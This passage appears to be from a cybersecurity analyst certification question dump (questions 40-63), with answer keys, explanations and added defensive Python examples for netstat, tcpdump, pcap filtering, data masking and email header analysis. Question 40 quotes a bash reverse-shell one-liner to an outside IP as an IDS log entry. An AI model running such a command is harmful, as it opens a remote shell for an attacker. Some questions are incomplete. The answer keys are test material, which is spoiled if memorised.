QUESTION 40
A security analyst identified the following suspicious entry on the host-based IDS logs:

bash -i >& /dev/tcp/10.1.2.3/8080 0>&1

Which of the following shell scripts should the analyst use to most accurately confirm if the activity is
ongoing?

A. #!/bin/bash
nc 10.1.2.3 8080 -vv >/dev/null && echo "Malicious activity" || echo "OK"
B. #!/bin/bash
ps -fea | grep 8080 >/dev/null && echo "Malicious activity" || echo "OK"
C. #!/bin/bash
ls /opt/tcp/10.1.2.3/8080 >/dev/null && echo "Malicious activity" || echo "OK"
D. #!/bin/bash
netstat -antp | grep 8080 >/dev/null && echo "Malicious activity" || echo "OK"

Correct Answer: D
Explanation

Explanation/Reference:
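
A more precise version of the check in option D, as an added example that is not part of the question bank: `grep 8080` also matches unrelated lines (a local port such as 18080, or a PID containing 8080), so this parses `netstat -antp` output and requires an ESTABLISHED socket whose foreign address is exactly 10.1.2.3:8080, reporting the owning process. The netstat output below is constructed.

```python
import re

# Constructed `netstat -antp` output as seen by root (the PID/Program name
# column is only populated for processes the caller is allowed to see).
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 0.0.0.0:18080           0.0.0.0:*               LISTEN      1193/java
tcp        0      0 10.0.0.15:51522         10.1.2.3:8080           ESTABLISHED 4120/bash
tcp        0      0 10.0.0.15:22            10.0.0.7:58012          ESTABLISHED 3988/sshd: root
tcp6       0      0 :::443                  :::*                    LISTEN      1204/nginx: master
"""

NETSTAT_RE = re.compile(
    r"^(?P<proto>tcp6?)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<foreign>\S+)\s+"
    r"(?P<state>\S+)\s*(?P<proc>.*)$"
)

# Program names that indicate an interactive shell owns the socket.
SHELLS = ("bash", "sh", "dash", "zsh", "ksh")


def parse_netstat(text):
    """Yield one dict per TCP socket line; header lines are skipped."""
    for line in text.splitlines():
        m = NETSTAT_RE.match(line)
        if m:
            yield m.groupdict()


def active_reverse_shells(text, peer_host, peer_port):
    """Return (pid, program) for every ESTABLISHED socket whose foreign address
    is exactly peer_host:peer_port. Matching the full peer avoids the false
    positives that a bare substring match on the port number produces."""
    peer = f"{peer_host}:{peer_port}"
    found = []
    for sock in parse_netstat(text):
        if sock["state"] != "ESTABLISHED" or sock["foreign"] != peer:
            continue
        pid, _, prog = sock["proc"].partition("/")
        found.append((pid, prog.strip()))
    return found


def is_shell_process(program):
    """True when the program column names a shell, e.g. 'bash' (not 'sshd: root')."""
    name = program.split(":")[0].strip()
    return name in SHELLS


if __name__ == "__main__":
    hits = active_reverse_shells(SAMPLE_NETSTAT, "10.1.2.3", 8080)
    for pid, prog in hits:
        verdict = "Malicious activity" if is_shell_process(prog) else "Review"
        print(f"{verdict}: pid {pid} ({prog}) connected to 10.1.2.3:8080")
    if not hits:
        print("OK")
```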

QUESTION 41
A company is concerned with finding sensitive file storage locations that are open to the public. The current
internal cloud network is flat. Which of the following is the best solution to secure the network?

A. Implement segmentation with ACLs.
B. Configure logging and monitoring to the SIEM.
C. Deploy MFA to cloud storage locations.
D. Roll out an IDS.

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 42
A security analyst is reviewing the findings of the latest vulnerability report for a company’s web
application. The web application accepts files for a Bash script to be processed if the files match a given
hash. The analyst is able to submit files to the system due to a hash collision. Which of the following
should the analyst suggest to mitigate the vulnerability with the fewest changes to the current script and
infrastructure?

A. Deploy a WAF to the front of the application.
B. Replace the current MD5 with SHA-256.
C. Deploy an antivirus application on the hosting system.
D. Replace the MD5 with digital signatures.

Correct Answer: B
Explanation

Explanation/Reference:
This option involves changing the hash algorithm from the vulnerable MD5 to the more secure SHA-256. It
addresses the hash collision vulnerability directly and doesn't require major changes to the existing
infrastructure or script logic.

QUESTION 43
A security analyst needs to mitigate a known, exploited vulnerability related to an attack vector that
embeds software through the USB interface. Which of the following should the analyst do first?

A. Conduct security awareness training on the risks of using unknown and unencrypted USBs.
B. Write a removable media policy that explains that USBs cannot be connected to a company asset.
C. Check configurations to determine whether USB ports are enabled on company assets.
D. Review logs to see whether this exploitable vulnerability has already impacted the company.

Correct Answer: C
Explanation

Explanation/Reference:
When dealing with a known and exploited vulnerability related to an attack vector that involves embedding
software through the USB interface, the primary concern is to immediately stop the active exploitation and
prevent further attacks. Given the options provided, option C is the best answer.

Check configurations for USB ports (Option C): This is the most immediate action to take. Disabling or
securing USB ports on company assets will prevent the attacker from further exploiting the vulnerability
through this attack vector. It's a quick and effective way to mitigate ongoing attacks.

QUESTION 44
A systems administrator receives reports of an internet-accessible Linux server that is running very
sluggishly. The administrator examines the server, sees a high amount of memory utilization, and suspects
a DoS attack related to half-open TCP sessions consuming memory. Which of the following tools would
best help to prove whether this server was experiencing this behavior?

A. Nmap
B. TCPDump
C. SIEM
D. EDR

Correct Answer: B
Explanation

Explanation/Reference:
In this scenario, where the administrator suspects a DoS attack related to half-open TCP sessions
consuming memory, TCPDump would be the best tool to use. It can help prove whether the server is
experiencing this behavior by capturing and analyzing the network packets to identify patterns consistent
with half-open TCP sessions.
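
To show what "patterns consistent with half-open TCP sessions" look like in a capture, here is an added example (not from the question bank) that reads the one-line-per-packet text `tcpdump -n` prints, tracks each client-initiated handshake, and counts flows that received a SYN-ACK but were never acknowledged. The packet lines are constructed.

```python
import re
from collections import Counter

# Constructed `tcpdump -n` text: one completed handshake from 203.0.113.10,
# then three clients that send SYN, receive SYN-ACK, and never send the ACK.
SAMPLE_TCPDUMP = """\
10:15:01.000100 IP 203.0.113.10.40001 > 10.0.0.15.80: Flags [S], seq 1, win 65535, length 0
10:15:01.000250 IP 10.0.0.15.80 > 203.0.113.10.40001: Flags [S.], seq 100, ack 2, win 29200, length 0
10:15:01.000400 IP 203.0.113.10.40001 > 10.0.0.15.80: Flags [.], ack 101, win 65535, length 0
10:15:01.000600 IP 203.0.113.10.40001 > 10.0.0.15.80: Flags [P.], seq 2:80, ack 101, win 65535, length 78
10:15:02.100000 IP 198.51.100.77.1025 > 10.0.0.15.80: Flags [S], seq 1, win 512, length 0
10:15:02.100100 IP 10.0.0.15.80 > 198.51.100.77.1025: Flags [S.], seq 300, ack 2, win 29200, length 0
10:15:02.100200 IP 198.51.100.78.1025 > 10.0.0.15.80: Flags [S], seq 1, win 512, length 0
10:15:02.100300 IP 10.0.0.15.80 > 198.51.100.78.1025: Flags [S.], seq 301, ack 2, win 29200, length 0
10:15:02.100400 IP 198.51.100.79.1025 > 10.0.0.15.80: Flags [S], seq 1, win 512, length 0
10:15:02.100500 IP 10.0.0.15.80 > 198.51.100.79.1025: Flags [S.], seq 302, ack 2, win 29200, length 0
"""

# Timestamp, source ip.port, destination ip.port, and the TCP flags tcpdump prints.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) IP (?P<src>[\d.]+)\.(?P<sport>\d+) > (?P<dst>[\d.]+)\.(?P<dport>\d+): "
    r"Flags \[(?P<flags>[^\]]*)\]"
)


def handshake_states(text):
    """Return {(client, cport, server, sport): state} for each client-initiated
    flow, where state is 'syn_sent', 'syn_acked' or 'established'."""
    states = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        f = m.groupdict()
        flags = f["flags"]
        fwd = (f["src"], f["sport"], f["dst"], f["dport"])
        rev = (f["dst"], f["dport"], f["src"], f["sport"])
        if flags == "S":                      # client SYN opens a new flow
            states.setdefault(fwd, "syn_sent")
        elif flags == "S." and states.get(rev) == "syn_sent":
            states[rev] = "syn_acked"         # server answered with SYN-ACK
        elif "." in flags and states.get(fwd) == "syn_acked":
            states[fwd] = "established"       # client's ACK completes the handshake
    return states


def half_open_summary(text):
    """Count flows that never completed the handshake, per server socket and per
    client, so the analyst can see whether a flood targets one service and
    whether it comes from one or many sources."""
    states = handshake_states(text)
    half_open = [k for k, s in states.items() if s != "established"]
    return {
        "total": len(states),
        "half_open": len(half_open),
        "by_server": dict(Counter(f"{k[2]}:{k[3]}" for k in half_open)),
        "by_client": dict(Counter(k[0] for k in half_open)),
    }


if __name__ == "__main__":
    print(half_open_summary(SAMPLE_TCPDUMP))
```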

QUESTION 45
A security analyst is validating a particular finding that was reported in a web application vulnerability scan
to make sure it is not a false positive. The security analyst uses the snippet below:
Which of the following vulnerability types is the security analyst validating?

A. Directory traversal
B. XSS
C. XXE
D. SSRF

Correct Answer: C
Explanation

Explanation/Reference:
XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to
interfere with an application's processing of XML data. It often allows an attacker to view files on the
application server filesystem, and to interact with any back-end or external systems that the application
itself can access.

In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other
back-end infrastructure, by leveraging the XXE vulnerability to perform server-side request forgery (SSRF)
attacks.

References:
https://portswigger.net/web-security/xxe
https://portswigger.net/web-security/xxe/xml-entities
https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing

QUESTION 46
Which of the following is the most important factor to ensure accurate incident response reporting?

A. A well-defined timeline of the events
B. A guideline for regulatory reporting
C. Logs from the impacted system
D. A well-developed executive summary

Correct Answer: A
Explanation

Explanation/Reference:
Although all of the options presented are important factors in ensuring accurate incident response
reporting, option A is generally considered the most important. Having a detailed timeline of
events allows incident responders to understand the sequence of actions, the duration of the incident, and
the relationships between different actions. This helps in identifying the root cause of the incident,
understanding its scope, and crafting an effective response strategy.

QUESTION 47
A security analyst is trying to detect connections to a suspicious IP address by collecting the packet
captures from the gateway. Which of the following commands should the security analyst consider
running?

A. grep [IP address] packets.pcap
B. cat packets.pcap | grep [IP Address]
C. tcpdump -n -r packets.pcap host [IP address]
D. strings packets.pcap | grep [IP Address]

Correct Answer: C
Explanation

Explanation/Reference:
The -n flag prevents DNS resolution of addresses (faster, and it does not generate lookups that could tip
off the attacker), the -r flag reads from the saved pcap file instead of a live interface, and the BPF
expression host [IP address] matches every packet in which the address is either the source or the
destination. The grep, cat and strings variants do not work because a pcap stores IP addresses as four
binary bytes inside the packet headers, not as the dotted-decimal text those tools would search for.
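
As an added example (not part of the dump), the Python below builds a tiny pcap in memory, applies the `host` match the way the BPF filter does (source or destination), and runs the ASCII search that grep or strings would perform on the same file. The MAC bytes, addresses and payload are constructed; only the standard library is used.

```python
"""Added example (not from the page): what `tcpdump -n -r packets.pcap host <ip>` matches,
implemented over a constructed pcap so it runs offline with only the standard library."""
import ipaddress
import struct

PCAP_MAGIC = 0xA1B2C3D4          # little-endian, microsecond timestamps
LINKTYPE_ETHERNET = 1


def ipv4_frame(src: str, dst: str, proto: int = 6, payload: bytes = b"") -> bytes:
    """Ethernet II + minimal IPv4 header (checksum left zero; enough for filtering)."""
    eth = b"\x00\x11\x22\x33\x44\x55" + b"\x66\x77\x88\x99\xaa\xbb" + b"\x08\x00"
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                     ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return eth + ip + payload


def build_pcap(frames) -> bytes:
    header = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    records = b"".join(struct.pack("<IIII", 1700000000 + i, 0, len(f), len(f)) + f
                       for i, f in enumerate(frames))
    return header + records


def iter_frames(pcap: bytes):
    """Walk the pcap record headers (either byte order) and yield the raw frames."""
    (magic,) = struct.unpack_from("<I", pcap, 0)
    order = "<" if magic == PCAP_MAGIC else ">"
    offset = 24
    while offset + 16 <= len(pcap):
        _sec, _usec, incl_len, _orig_len = struct.unpack_from(order + "IIII", pcap, offset)
        offset += 16
        yield pcap[offset:offset + incl_len]
        offset += incl_len


def filter_host(pcap: bytes, host: str) -> list:
    """Equivalent of the BPF expression `host <ip>`: match when <ip> is source OR destination.
    Returns (src, dst, ip_protocol) tuples."""
    target = ipaddress.IPv4Address(host).packed
    hits = []
    for frame in iter_frames(pcap):
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # EtherType 0x0800 = IPv4
            continue
        src, dst = frame[26:30], frame[30:34]               # IPv4 header starts at byte 14
        if target in (src, dst):
            hits.append((str(ipaddress.IPv4Address(src)),
                         str(ipaddress.IPv4Address(dst)), frame[23]))
    return hits


def text_search(pcap: bytes, host: str) -> bool:
    """What grep/strings would do: look for the dotted-quad as ASCII. Addresses are
    stored as 4 binary bytes, so this is False even when the host is in every packet."""
    return host.encode() in pcap


# Constructed capture: the suspicious address appears once, as a destination.
SUSPICIOUS = "203.0.113.9"
SAMPLE_PCAP = build_pcap([
    ipv4_frame("10.0.0.5", SUSPICIOUS, payload=b"GET / HTTP/1.1\r\n"),
    ipv4_frame("198.51.100.7", "10.0.0.5"),
    ipv4_frame("10.0.0.5", "10.0.0.8", proto=17),
])
```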

QUESTION 48
A security analyst reviews the latest vulnerability scans and observes there are vulnerabilities with similar
CVSSv3 scores but different base score metrics. Which of the following attack vectors should the analyst
remediate first?

A. CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
B. CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
C. CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
D. CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Correct Answer: C
Explanation

Explanation/Reference:
The four vectors are identical except for Attack Vector. The AV metric weights are Network 0.85, Adjacent
0.62, Local 0.55 and Physical 0.20, so the network-reachable vulnerability (C) has the highest
exploitability sub-score and base score (8.8, against 8.0 for B, 7.8 for D and 6.6 for A) and should be
remediated first.

Reference: https://www.first.org/cvss/specification-document

QUESTION 49
A security analyst must review a suspicious email to determine its legitimacy. Which of the following should
be performed? (Choose two.)

A. Evaluate scoring fields, such as Spam Confidence Level and Bulk Complaint Level
B. Review the headers from the forwarded email
C. Examine the recipient address field
D. Review the Content-Type header
E. Evaluate the HELO or EHLO string of the connecting email server
F. Examine the SPF, DKIM, and DMARC fields from the original email

Correct Answer: BF
Explanation

Explanation/Reference:
Review the headers from the forwarded email: Examining the email headers can provide crucial
information about the email's source, path, and any intermediaries it went through. This information can
help identify signs of spoofing or suspicious behavior.

Examine the SPF, DKIM, and DMARC fields from the original email: These three mechanisms (Sender
Policy Framework - SPF, DomainKeys Identified Mail - DKIM, and Domain-based Message Authentication,
Reporting, and Conformance - DMARC) are used to authenticate the sender's domain and reduce the
likelihood of email spoofing. Checking these fields can provide insights into the authenticity of the email.

QUESTION 50
A vulnerability analyst received a list of system vulnerabilities and needs to evaluate the relevant impact of
the exploits on the business. Given the constraints of the current sprint, only three can be remediated.
Which of the following represents the least impactful risk, given the CVSS3.1 base scores?

A. AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L - Base Score 6.0
B. AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:L - Base Score 7.2
C. AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H - Base Score 6.4
D. AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L - Base Score 6.5

Correct Answer: A
Explanation

Explanation/Reference:
In the given options, the least impactful risk can be determined by looking at the CVSS Base Scores. The
lower the base score, the less impactful the vulnerability. Among the given options, option A has the lowest
base score of 6.0.

QUESTION 51
A recent vulnerability scan resulted in an abnormally large number of critical and high findings that require
patching. The SLA requires that the findings be remediated within a specific amount of time. Which of the
following is the best approach to ensure all vulnerabilities are patched in accordance with the SLA?

A. Integrate an IT service delivery ticketing system to track remediation and closure
B. Create a compensating control item until the system can be fully patched
C. Accept the risk and decommission current assets as end of life
D. Request an exception and manually patch each system

Correct Answer: A
Explanation

Explanation/Reference:
An IT service delivery ticketing system gives every finding an owner, a due date derived from the SLA and
a closure record, so remediation can be tracked and evidenced against the SLA. Compensating controls,
exceptions and decommissioning defer or avoid patching rather than ensuring it happens on time.

Reference: https://phoenix.security/using-slas-for-better-vulnerability-management-remediation-improving-
developers-workflow/

QUESTION 52
Which of the following would help an analyst to quickly find out whether the IP address in a SIEM alert is a
known-malicious IP address?

A. Join an information sharing and analysis center specific to the company's industry
B. Upload threat intelligence to the IPS in STIX/TAXII format
C. Add data enrichment for IPs in the ingestion pipeline
D. Review threat feeds after viewing the SIEM alert

Correct Answer: C
Explanation

Explanation/Reference:
The fastest way to know whether an alerted IP address is known-malicious is to enrich IP addresses with
threat intelligence in the ingestion pipeline (option C). Note that the option refers to IPs, the addresses
themselves, not to an intrusion prevention system.
Data enrichment adds context to raw event fields from external sources; for IP addresses that typically
means reputation, geolocation, ASN and matches against threat-intelligence indicators. When the
enrichment happens as events are ingested, every alert already carries that context, so the analyst reads
the verdict directly from the alert instead of pivoting to other tools. This saves time, and it also lets
correlation rules act on the enriched fields (for example, escalate any connection to an indicator-matched
address) before an analyst is involved.
The other options are slower or less direct. Joining an information sharing and analysis center (ISAC)
specific to the company's industry (A) provides valuable intelligence and best practices, but it does not by
itself put a verdict on the alert. Uploading threat intelligence to the IPS in STIX/TAXII format (B) helps the
IPS block known-bad traffic, but the SIEM alert still lacks the context unless that feed is integrated with
the SIEM as well. Reviewing threat feeds after viewing the alert (D) works, but it is a manual step repeated
for every alert, which is exactly the delay enrichment at ingestion removes. Therefore, C is the best option
among the choices given.
Reference: https://ipinfo.io/use-cases/ip-data-for-data-enrichment
QUESTION 53
An organization was compromised, and the usernames and passwords of all employees were leaked
online. Which of the following best describes the remediation that could reduce the impact of this situation?

A. Multifactor authentication
B. Password changes
C. System hardening
D. Password encryption

Correct Answer: A
Explanation

Explanation/Reference:
Multifactor authentication (MFA) is a security method that requires users to provide two or more pieces of
evidence to verify their identity, such as a password, a PIN, a fingerprint, or a one-time code. MFA can
reduce the impact of a credential leak because even if the attackers have the usernames and passwords
of the employees, they still need another factor to access the organization's systems and resources.
Password changes, system hardening, and password encryption are also good security practices, but
forcing password changes only helps until the next leak, and hardening and encryption do not address
the immediate threat of credentials that are already in the attackers' hands.
References: CompTIA CySA+ Certification Exam Objectives, [What Is Multifactor Authentication (MFA)?]

QUESTION 54
A company is deploying new vulnerability scanning software to assess its systems. The current network is
highly segmented, and the networking team wants to minimize the number of unique firewall rules. Which
of the following scanning techniques would be most efficient to achieve the objective?

A. Deploy agents on all systems to perform the scans
B. Deploy a central scanner and perform non-credentialed scans
C. Deploy a cloud-based scanner and perform a network scan
D. Deploy a scanner sensor on every segment and perform credentialed scans

Correct Answer: D
Explanation

Explanation/Reference:
Placing a scanner sensor inside each segment keeps the scan traffic local to that segment, so the
firewalls between segments only need to permit each sensor's connection back to the management
console, rather than a rule set that lets a central scanner reach every host on every segment.
Credentialed scans from those sensors also return the most complete findings, whereas a central
non-credentialed scanner (B) or a cloud scanner (C) needs rules into every segment and sees less.

QUESTION 55
An organization's email account was compromised by a bad actor. Given the following information:
Which of the following is the length of time the team took to detect the threat?


QUESTION 56
A security administrator needs to import PII data records from the production environment to the test
environment for testing purposes. Which of the following would best protect data confidentiality?

A. Data masking
B. Hashing
C. Watermarking
D. Encoding

Correct Answer: A
Explanation

Explanation/Reference:
Reference: https://aws.amazon.com/what-is/data-masking/#:~:text=Data%20masking%20creates%20fake
%20versions,access%20to%20the%20original%20dataset
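
As an added example (not part of the dump), the Python below masks PII records before they are copied from production to test. Tokens are derived with a keyed HMAC so the same input always maps to the same token (joins and duplicate detection still work in test) while the test environment never holds the key that would be needed to reproduce or reverse a token. The key, the records and the field names are constructed for this example.

```python
"""Added example (not from the page): masking PII before copying production records to test."""
import hashlib
import hmac
import re

# Constructed secret and records. The key stays in production; the test copy never sees it.
MASKING_KEY = b"rotate-me-this-is-a-constructed-key"
RECORDS = [
    {"id": 1, "name": "Ada Example", "email": "ada@customer.example",
     "ssn": "123-45-6789", "phone": "+1-555-0100", "plan": "gold"},
    {"id": 2, "name": "Bo Example", "email": "bo@customer.example",
     "ssn": "987-65-4321", "phone": "+1-555-0199", "plan": "gold"},
]


def _token(value: str, length: int = 10) -> str:
    """Keyed, deterministic token. Unkeyed hashing would be reversible by brute force for
    low-entropy values such as SSNs (only 10**9 candidates)."""
    return hmac.new(MASKING_KEY, value.lower().encode(), hashlib.sha256).hexdigest()[:length]


def mask_email(value: str) -> str:
    """Replace the mailbox, keep the domain so routing logic under test still behaves."""
    local, _, domain = value.partition("@")
    return f"user-{_token(local)}@{domain}"


def mask_ssn(value: str) -> str:
    """Format-preserving: nine digits in the NNN-NN-NNNN shape, derived from the token."""
    digits = re.sub(r"\D", "", value)
    fake = str(int(_token(digits, 8), 16) % 10**9).zfill(9)
    return f"{fake[:3]}-{fake[3:5]}-{fake[5:]}"


def mask_phone(value: str) -> str:
    """Keep country and area code, replace the subscriber digits."""
    last4 = str(int(_token(value, 6), 16) % 10000).zfill(4)
    return re.sub(r"\d{4}$", last4, value)


def mask_record(rec: dict) -> dict:
    masked = dict(rec)
    masked["name"] = "Customer " + _token(rec["name"], 6).upper()
    masked["email"] = mask_email(rec["email"])
    masked["ssn"] = mask_ssn(rec["ssn"])
    masked["phone"] = mask_phone(rec["phone"])
    return masked   # id and plan are not PII and stay usable by the test logic


def verify_masked(original: dict, masked: dict) -> bool:
    """Release gate for the export: PII replaced, formats preserved, non-PII untouched."""
    domain = original["email"].partition("@")[2]
    checks = [
        masked["name"] != original["name"],
        masked["email"] != original["email"] and masked["email"].endswith("@" + domain),
        masked["ssn"] != original["ssn"],
        re.fullmatch(r"\d{3}-\d{2}-\d{4}", masked["ssn"]) is not None,
        re.fullmatch(r"\+1-555-\d{4}", masked["phone"]) is not None,
        masked["id"] == original["id"] and masked["plan"] == original["plan"],
    ]
    return all(checks)
```

Hashing (option B) would also be irreversible, but an unsalted hash of a nine-digit SSN is trivially brute-forced, and a hash breaks the field format that test code expects; encoding (D) is reversible by anyone.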

QUESTION 57
The email system administrator for an organization configured DKIM signing for all email legitimately sent
by the organization. Which of the following would most likely indicate an email is malicious if the company's
domain name is used as both the sender and the recipient?

A. The message fails a DMARC check
B. The sending IP address is the hosting provider
C. The signature does not meet corporate standards
D. The sender and reply address are different

Correct Answer: A
Explanation

Explanation/Reference:
With DKIM signing in place, mail that legitimately originates from the organization carries an aligned
DKIM signature and passes DMARC. A message that uses the company's domain as both sender and
recipient but fails DMARC was not sent through the organization's signing infrastructure, which is the
strongest single indicator of spoofing among the options; a differing reply address or a hosting-provider
source IP can also occur in legitimate mail.

Reference: https://easydmarc.com/tools/dmarc-lookup

QUESTION 58
During an incident involving phishing, a security analyst needs to find the source of the malicious email.
Which of the following techniques would provide the analyst with this information?

A. Header analysis
B. Packet capture
C. SSL inspection
D. Reverse engineering

Correct Answer: A
Explanation

Explanation/Reference:
Each mail server that handles a message prepends its own Received: header, so reading the Received
chain from the bottom up walks back toward the originating relay and its IP address, and the
Authentication-Results header shows how the receiving server evaluated SPF, DKIM and DMARC. A packet
capture or SSL inspection only sees the final hop into the organization, and reverse engineering applies
to the payload, not to where the message came from.
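
As an added example serving QUESTION 49, QUESTION 57 and this question (not code from the dump), the Python below triages two constructed messages with the standard library: it walks the Received chain back to the first hop, extracts the SPF, DKIM and DMARC results from Authentication-Results, evaluates DMARC alignment itself, and flags a Reply-To domain that differs from the From domain. The hosts, addresses and message bodies are constructed; the alignment check is simplified (no public-suffix handling).

```python
"""Added example (not from the page): header analysis of a suspicious email."""
import email
import re
from email.utils import parseaddr

# Constructed messages. Each MTA prepends its Received: line, so the last one is the first hop.
SUSPICIOUS_RAW = """Return-Path: <bounce@mailer.invalid>
Received: from mx.corp.example (mx.corp.example [198.51.100.10])
    by inbox.corp.example with ESMTPS id k1; Tue, 05 Mar 2024 09:15:02 +0000
Received: from vps77.hosting.invalid (vps77.hosting.invalid [203.0.113.77])
    by mx.corp.example with ESMTP id k0; Tue, 05 Mar 2024 09:14:58 +0000
Authentication-Results: mx.corp.example;
    spf=fail (sender IP is 203.0.113.77) smtp.mailfrom=mailer.invalid;
    dkim=none;
    dmarc=fail (p=REJECT) header.from=corp.example
From: "Finance Director" <director@corp.example>
Reply-To: director.urgent@webmail.invalid
To: payments@corp.example
Subject: Urgent wire transfer
Content-Type: text/plain; charset="utf-8"

Please process the attached wire today.
"""

LEGIT_RAW = """Return-Path: <director@corp.example>
Received: from mail.corp.example (mail.corp.example [198.51.100.25])
    by mx.corp.example with ESMTPS id m0; Tue, 05 Mar 2024 10:00:00 +0000
Authentication-Results: mx.corp.example;
    spf=pass smtp.mailfrom=corp.example;
    dkim=pass header.d=corp.example header.s=sel1;
    dmarc=pass header.from=corp.example
From: "Finance Director" <director@corp.example>
To: payments@corp.example
Subject: Q1 budget
Content-Type: text/plain; charset="utf-8"

Budget attached.
"""

RECEIVED_RE = re.compile(r"from\s+(\S+)\s+\((\S+)\s+\[([0-9a-fA-F.:]+)\]\)")


def domain_of(addr_header) -> str:
    _, addr = parseaddr(addr_header or "")
    return addr.rpartition("@")[2].lower()


def aligned(domain: str, org: str) -> bool:
    """Simplified relaxed alignment: same domain or a subdomain of it."""
    return bool(domain) and (domain == org or domain.endswith("." + org))


def received_chain(msg) -> list:
    """Hops in transit order: first hop (origin) first."""
    hops = []
    for line in reversed(msg.get_all("Received", [])):
        m = RECEIVED_RE.search(" ".join(str(line).split()))
        if m:
            hops.append({"helo": m.group(1), "rdns": m.group(2), "ip": m.group(3)})
    return hops


def auth_results(msg) -> dict:
    text = " ".join(str(msg.get("Authentication-Results", "")).split())
    out = dict(re.findall(r"\b(spf|dkim|dmarc)=(\w+)", text))
    for key in ("smtp.mailfrom", "header.d", "header.from"):
        m = re.search(re.escape(key) + r"=([\w.-]+)", text)
        out[key] = m.group(1).lower() if m else ""
    return out


def dmarc_verdict(from_domain: str, auth: dict) -> str:
    """DMARC passes when an aligned SPF pass OR an aligned DKIM pass exists."""
    spf_ok = auth.get("spf") == "pass" and aligned(auth.get("smtp.mailfrom", ""), from_domain)
    dkim_ok = auth.get("dkim") == "pass" and aligned(auth.get("header.d", ""), from_domain)
    return "pass" if spf_ok or dkim_ok else "fail"


def triage(raw: str) -> dict:
    msg = email.message_from_string(raw)
    hops = received_chain(msg)
    auth = auth_results(msg)
    from_domain = domain_of(msg.get("From"))
    reply_domain = domain_of(msg.get("Reply-To")) or from_domain
    return {
        "from_domain": from_domain,
        "origin_ip": hops[0]["ip"] if hops else None,
        "origin_host": hops[0]["rdns"] if hops else None,
        "auth": auth,
        "dmarc": dmarc_verdict(from_domain, auth),
        "reply_to_mismatch": reply_domain != from_domain,
    }
```

Note that the original message, not a forwarded copy, must be analysed: forwarding replaces the Received chain and the authentication results with those of the forwarding hop.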

QUESTION 59
An analyst wants to ensure that users only leverage web-based software that has been pre-approved by
the organization. Which of the following should be deployed?

A. Blocklisting
B. Allowlisting
C. Graylisting
D. Webhooks

Correct Answer: B
Explanation

Explanation/Reference:
Reference: https://www.sentinelone.com/cybersecurity-101/application-whitelisting/

QUESTION 60
During a cybersecurity incident, one of the web servers at the perimeter network was affected by
ransomware. Which of the following actions should be performed immediately?

A. Shut down the server.
B. Reimage the server.
C. Quarantine the server.
D. Update the OS to latest version.

Correct Answer: C
Explanation

Explanation/Reference:
Quarantining the server is the right immediate action: it isolates the affected server from the rest of the
network, stops the ransomware from spreading to other systems or data, and preserves the evidence of
the attack for forensic analysis and any law enforcement investigation. The other actions are either not
urgent or destructive. Shutting down the server does not remove the ransomware, discards volatile
memory that may hold encryption keys or running-process evidence, and can trigger a deletion
mechanism in some ransomware families. Reimaging the server restores functionality but erases the
traces of the attack and any chance of recovering the encrypted data. Updating the OS to the latest
version may close some vulnerabilities, but it neither removes the ransomware nor decrypts the data.

https://www.cisa.gov/stopransomware/ransomware-guide
https://www.cisa.gov/stopransomware/ive-been-hit-ransomware

QUESTION 61
An organization recently changed its BC and DR plans. Which of the following would best allow for the
incident response team to test the changes without any impact to the business?

A. Perform a tabletop drill based on previously identified incident scenarios.
B. Simulate an incident by shutting down power to the primary data center.
C. Migrate active workloads from the primary data center to the secondary location.
D. Compare the current plan to lessons learned from previous incidents.

Correct Answer: A
Explanation

Explanation/Reference:
Performing a tabletop drill based on previously identified incident scenarios is the best choice to test the
changes in the BC (Business Continuity) and DR (Disaster Recovery) plans without impacting the
business.

A tabletop drill gathers the key stakeholders to walk through hypothetical scenarios and how they would
be handled under the updated plans. It tests preparedness without any actual disruption or risk to
operations, whereas shutting down power or migrating live workloads causes real disruption, and
comparing the plan to lessons learned does not exercise it at all.

Reference: https://www.alertmedia.com/blog/tabletop-exercises/

QUESTION 62
Security analysts review logs on multiple servers on a daily basis. Which of the following implementations
will give the best central visibility into the events occurring throughout the corporate environment without
logging in to the servers individually?

A. Deploy a database to aggregate the logging
B. Configure the servers to forward logs to a SIEM
C. Share the log directory on each server to allow local access.
D. Automate the emailing of logs to the analysts.

Correct Answer: B
Explanation

Explanation/Reference:
The best implementation to give central visibility into the events occurring throughout the corporate
environment without logging in to the servers individually is B. Configure the servers to forward logs to
a SIEM.
A SIEM (Security Information and Event Management) is a security solution that helps organizations
detect, analyze, and respond to security threats before they disrupt business. SIEM tools collect,
aggregate, and correlate log data from sources across the network, such as applications, devices,
servers, and users, and provide real-time alerts, dashboards, reports, and incident response capabilities
to help security teams identify and mitigate attacks.
By configuring the servers to forward logs to a SIEM, the security analysts get a single view of potential
threats and can monitor security incidents across the corporate environment without logging in to the
servers individually. This saves time, improves efficiency, and enhances the security posture.
Deploying a database to aggregate the logging (A) does not provide the analysis, correlation, and alerting
of a SIEM. Sharing the log directory on each server to allow local access (C) is neither scalable nor
secure for a large number of servers. Automating the emailing of logs to the analysts (D) is neither timely
nor effective for real-time detection and response. Therefore, B is the best option among the choices
given.

QUESTION 63
Following a recent security incident, the Chief Information Security Officer is concerned with improving
